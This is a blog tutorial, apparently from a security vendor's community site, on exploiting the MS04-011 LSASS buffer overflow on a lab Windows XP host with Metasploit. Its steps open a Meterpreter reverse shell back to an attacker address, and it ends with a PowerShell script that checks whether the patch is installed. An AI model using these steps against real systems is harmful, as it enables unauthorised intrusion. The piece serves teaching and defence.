Microsoft LSASS Service Buffer Overflow Exploitation & Prevention Part 1 

Mar 27, 2012 02:15 PM

 

I am writing this article in two parts. In the first part I will show you how to exploit the Microsoft LSASS Service Buffer Overflow vulnerability in Windows with Metasploit Express Edition, and in the second part I will show you how to prevent exploitation of the Microsoft LSASS Service Buffer Overflow vulnerability in Windows with Symantec Critical System Protection (SCSP).
 
Microsoft LSASS Service Buffer Overflow
 
This module exploits a stack buffer overflow in the LSASS service; the vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need to run this module twice. DCERPC request fragmentation can be performed by setting the 'FragSize' parameter.
 
Exploitation of Microsoft LSASS Service Buffer Overflow
 
1. Our victim is running Windows XP Professional SP2 (192.168.42.72).
 
    
 
2. I am using BackTrack 5 R1 as the attacker machine; its IP address is 192.168.42.179.
 
3. I am using the windows/smb/ms04_011_lsass Metasploit module to exploit the Microsoft LSASS Service Buffer Overflow (use exploit/windows/smb/ms04_011_lsass).
 
    
 
4. To view the available options, run the show options command.
 
    
 
5. I have to set RHOST, i.e. the target machine IP address (set srvhost 192.168.42.72).
 
    
 
6. I am using the windows/meterpreter/reverse_tcp payload.
 
    
 
7. Now I have to enter LHOST (Local Host), i.e. 192.168.42.179 (the attacker machine IP address).
 
    
 
8. Type exploit and hit Enter. The exploit runs against the victim machine and returns a shell to the attacker machine; the attacker now has a Meterpreter shell on the victim.
 
    
 
9. Let's type the ipconfig command to verify whether we have entered the victim machine or not.
 
    
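The walkthrough above depends on two conditions on the target: the MS04-011 update (KB835732) is missing, and TCP/445 (the SMB port the DCERPC request travels over) is reachable. The following script is an added defender's check, not code from the original post or from Metasploit; it reports, per host, whether KB835732 is installed and whether 445 answers, so an administrator can find such hosts before an attacker does. It assumes a management host running Windows PowerShell 4 or later (for Test-NetConnection) with WMI/RPC access to the hosts named in -ComputerName; the host names you pass are your own.

```powershell
# Added example (not part of the original post): per-host check for the
# condition the MS04-011 LSASS walkthrough relies on.
# KB835732 is the Microsoft update that fixed MS04-011.
param(
    # Hosts to inspect; defaults to the local machine (assumption: you pass your own list)
    [string[]]$ComputerName = @($env:COMPUTERNAME)
)

foreach ($computer in $ComputerName) {
    # Installed-update inventory: Get-HotFix returns nothing when the KB is absent
    $patched = $null -ne (Get-HotFix -Id 'KB835732' -ComputerName $computer -ErrorAction SilentlyContinue)

    # OS caption, so the report shows which generation of Windows this is
    $os = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $computer -ErrorAction SilentlyContinue).Caption

    # The exploit is delivered over SMB, so a reachable 445 is the second half of the risk
    $smbOpen = (Test-NetConnection -ComputerName $computer -Port 445 -WarningAction SilentlyContinue).TcpTestSucceeded

    # One row per host; Exposed = unpatched AND SMB reachable
    [pscustomobject]@{
        Computer   = $computer
        OS         = $os
        KB835732   = $patched
        Smb445Open = $smbOpen
        Exposed    = (-not $patched) -and $smbOpen
    }
}
```

Save it as, say, Check-Ms04011.ps1 (an assumed file name) and run `.\Check-Ms04011.ps1 -ComputerName xp-lab-01,srv-02 | Format-Table`. A row with Exposed = True is a host in exactly the state the lab victim above is in; the fix is the update itself, and until it is applied, blocking 445 at the host firewall removes the delivery path. Hosts so old that they have no PowerShell can still be queried remotely this way, since Get-HotFix and Get-WmiObject run from the management host.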
 
In the next part, I will show you how to prevent exploitation of the Microsoft LSASS Service Buffer Overflow vulnerability in Windows with Symantec Critical System Protection (SCSP).

Comments

Aug 21, 2015 05:35 AM

Hello Sanehdeep,

Can you please give me the link to Access 2nd Part of this Article?

Thanks and Regards,

Shriram Iyer
